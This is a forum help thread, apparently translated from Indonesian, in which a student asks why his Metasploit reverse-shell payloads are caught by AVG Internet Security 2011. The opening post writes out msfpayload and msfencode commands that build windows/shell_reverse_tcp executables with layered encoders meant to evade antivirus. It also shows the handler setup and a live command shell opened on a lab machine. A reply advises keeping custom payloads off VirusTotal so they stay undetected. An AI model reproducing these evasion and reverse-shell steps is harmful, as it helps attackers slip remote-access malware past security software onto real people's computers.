[HELP] bypassing AVG IS 2011 with windows/shell_reverse_tcp
#1
It's not that I don't know there's already a thread about bypassing Avira AV, but this one, bro, uses a different type of payload from red-dragon's, which used meterpreter and vanish.sh,

according to the source, the payloads use windows/shell_reverse_tcp and windows/shell/reverse_tcp built as .exe

but I want to ask, bro, because after following the source 4 times, my payload 7.exe still gets chopped by my AVG IS 2011,,
the source is here,,

here's my problem, bro
ok, my turn to test using AVG Internet Security 2011 Full Version

I went ahead and built 3 payloads and moved them straight to the victim computer, which is protected by AVG IS 2011 pro,,

Quote:
root@bt:/pentest/exploits/framework# msfpayload windows/shell_reverse_tcp LHOST=192.168.43.187 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -t exe > /tmp/2.exe
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)

root@bt:/pentest/exploits/framework# file /tmp/2.exe
/tmp/2.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

root@bt:/pentest/exploits/framework# msfpayload windows/shell_reverse_tcp LHOST=192.168.43.187 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t raw -c 10 | msfencode -e x86/countdown -t exe > /tmp/6.exe

root@bt:/pentest/exploits/framework# msfpayload windows/shell/reverse_tcp LHOST=192.168.43.187 LPORT=31337 X > /tmp/7.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell/reverse_tcp
Length: 290
Options: {"LHOST"=>"192.168.43.187", "LPORT"=>"31337"}

next, copy them over, hehehe



here's the result of running the backup of payload 2 that didn't get chopped by my AVG (the payload 2 from the first build)


root@bt:/pentest/exploits/framework# ./msfconsole




=[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ -- --=[ 716 exploits - 361 auxiliary - 68 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
=[ svn r13462 updated 160 days ago (2011.08.01)

Warning: This copy of the Metasploit Framework was last updated 160 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD 192.168.43.187
[-] The value specified for PAYLOAD is not valid.
msf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(handler) > set LHOST 192.168.43.187
LHOST => 192.168.43.187
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.43.187:31337
[*] Starting the payload handler...
[*] Sending stage (240 bytes) to 192.168.43.96
[*] Command shell session 1 opened (192.168.43.187:31337 -> 192.168.43.96:49240) at 2012-01-08 20:37:52 +0700

Microsoft Windows [Version 6.1.7600]
Copyright © 2009 Microsoft Corporation. All rights reserved.

C:\Users\Acer\Documents>More?
More? more?
more?
'����u�Grojmore?' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\Acer\Documents>ls
ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\Acer\Documents>dir
dir
Volume in drive C has no label.
Volume Serial Number is E2E8-18E4

Directory of C:\Users\Acer\Documents

08/01/2012 07:49 <DIR> .
08/01/2012 07:49 <DIR> ..
08/01/2012 07:29 73.802 2.exe
22/09/2011 15:24 <DIR> kerjaan
12/08/2011 08:49 <DIR> OneNote Notebooks
04/10/2011 11:56 <DIR> PTS DAMSUAR
18/09/2011 08:37 <DIR> Youcam
1 File(s) 73.802 bytes
6 Dir(s) 34.882.576.384 bytes free

C:\Users\Acer\Documents>^C
Abort session 1? [y/N] n
Microsoft Windows [Version 6.1.7600]
Copyright © 2009 Microsoft Corporation. All rights reserved.

C:\Users\Acer\Documents>More? More? more?
'����u�Grojmore?' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\Acer\Documents>ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\Acer\Documents>dir
Volume in drive C has no label.
Volume Serial Number is E2E8-18E4

Directory of C:\Users\Acer\Documents

08/01/2012 07:49 <DIR> .
08/01/2012 07:49 <DIR> ..
08/01/2012 07:29 73.802 2.exe
22/09/2011 15:24 <DIR> kerjaan
12/08/2011 08:49 <DIR> OneNote Notebooks
04/10/2011 11:56 <DIR> PTS DAMSUAR
18/09/2011 08:37 <DIR> Youcam
1 File(s) 73.802 bytes
6 Dir(s) 34.882.576.384 bytes free

C:\Users\Acer\Documents>





Just venting, bro,, honestly this is the 4th time I've tried it,, I'm curious,, on my first attempt payloads 6.exe and 7.exe got chopped by my AVG,, but payload 2.exe didn't get caught,,

according to what I read at the source, payloads 2 and 6 should be the ones that get chopped and payload 7 should survive,, but luckily I have a backup of file 2 that survived :) :D

so what do the masters think?? help me out,, I've already rebuilt payloads 2, 6, and 7 and they all keep getting chopped by AVG IS 2011

my screenshots
screenshot of my AVG
[Image: 302p9vc.png]
screenshot of the scan result on the 4th attempt
[Image: 2nbc0np.png]
screenshot of the backup payload 2.exe that survived uncaught (first attempt)
[Image: 23vhw2g.png]
sorry if I'm forcing a new thread about antivirus bypass,, but since I figured it's a different type of payload, I opened one,,

if that's wrong, just delete it, mods or admin :)

#2
quiet here,, I'll just figure it out myself even if I don't get it

#3
if payload 2.exe gets through, then yes, payload 2 really can bypass AVG IS, bro

as for payloads found on the internet, they won't last long, because antivirus companies surely have teams hunting for new payloads to keep their products up to date

especially if you build your own payload and upload it to virustotal.com with a good result like 2/36, for sure a few days later it can't bypass any antivirus anymore :D

plus the shell being used is meterpreter, which is already very well known worldwide hehehe
the best thing is to write your own shell, but I can't do that myself yet :P
just check here:
http://packetstormsecurity.org/files/tags/shell/

but study this first:
http://resources.infosecinstitute.com/sh...sources%29

happy experimenting, don't forget to sleep :)

#4
(01-09-2012, 01:00 AM)konspirasi Wrote: if payload 2.exe gets through, then yes, payload 2 really can bypass AVG IS, bro

as for payloads found on the internet, they won't last long, because antivirus companies surely have teams hunting for new payloads to keep their products up to date

especially if you build your own payload and upload it to virustotal.com with a good result like 2/36, for sure a few days later it can't bypass any antivirus anymore :D

plus the shell being used is meterpreter, which is already very well known worldwide hehehe
the best thing is to write your own shell, but I can't do that myself yet :P
just check here:
http://packetstormsecurity.org/files/tags/shell/

but study this first:
http://resources.infosecinstitute.com/sh...sources%29

happy experimenting, don't forget to sleep :)
thanks konspirasi :)
if you have more links, add them please :)

ok,, I'm also working on a web service assignment right now,,
putting the bt5 study on hold,,
college is really packed,, luckily this semester happens to include network administration and computer network security,,


#5
for security links you can follow twitter @ikonspirasi or my facebook, also ikonspirasi, bro :)

#6
ok bro,, :) thanks





